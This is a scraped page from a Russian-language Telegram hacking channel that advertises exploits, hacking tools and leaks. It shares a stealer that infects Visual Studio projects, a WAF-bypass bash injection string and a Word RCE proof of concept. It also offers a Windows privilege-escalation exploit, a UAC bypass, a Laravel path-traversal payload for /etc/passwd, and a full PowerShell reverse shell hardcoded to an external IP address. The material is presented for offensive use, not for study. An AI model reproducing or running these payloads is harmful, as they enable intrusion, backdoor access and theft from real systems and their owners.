Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
APT38_0day-Stealer.rar
7.2 KB
Lazarus-Tactic (APT38)
*
Можно написать 0day, а можно регулярно воровать 0days у трудолюбивых исследователей безопасности. Именно этим (ну не только) и занимались ребята из APT38, заражая Visual Studio (vcxproj).
В общем такой 0day-stealer

**После запуска программа заразит все ваши проекты Visual Studio**
🔥21😱8👍1
bash injection bypass waf

$0<<<$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\'
👍42🔥10😱6
Titan stealer и его панель (C2Panel) жирно палится
ThreatFox Database
👍9😱8
Нужно больше жира)))))
Analyzing a Python Malware Part 2
😱8
RemoteShellcodeExec
Выполнение шелл-кода из удаленного bin-файла с помощью Winhttp.
Shellcodes are dead, long live fileless shellcodes.
*
Пока что 0/26 detections
download
👍10🔥5😱3
использование setuid dos2unix позволяет выполнять запись произвольного файла от имени пользователя root.
👍8🔥6😱2
This media is not supported in your browser
VIEW IN TELEGRAM
Внимание !
через 10 минут опять понедельник.
Вот вам rootkit dog
😎
🔥20😱6👍2
BurpSuite
*
man\tutor
Вдруг вы забыли
👍21🔥4
pic of day
🔥18👍7😱5
8 марта вот вот настанет ! 😊

Поддержим проект ?)

BTC bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82
XMR 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k


#праздник
👍14😱6🔥3
0-CLICK Microsoft Word RCE exploit
CVE-2023-21716 Python
PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
😱16👍7🔥1
CVE-2023-21768 Local Privilege Escalation
Windows 11 22H2
POC exploit
*
usage:
Windows_AFD_LPE_CVE-2023-21768.exe <pid>
где <pid> это id процесса который нужно повысить до system

#windows #lpe
😱10👍3🔥2
Offline создание администратора Windows 10? 😈
Ога
Всё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.

OfflineAddAdmin2 (это новая версия)

Видео туториал
😱9🔥2👍1
🧐
🔥35😱10👍2
Круто !!! old school sniffing RJ45
берем крокодильчики
цепляем на витуху
погнали
Video
👍31😱19🔥5
полезные нагрузки подъехали
payloads
👍24🔥3
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно.
Тупо бэкдор!

usage:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
🔥34😱9👍5
Laravel Framework

Payload: //////////////////../../../../../../../../etc/passwd
🔥41😱13👍6
UAC bypass for x64 Windows 7 - 11
Понятно
iscsicpl.exe уязвим к перехвату порядка поиска DLL при запуске 32-битного бинарного файла Microsoft на 64-битном хосте через SysWOW64.
😱7👍1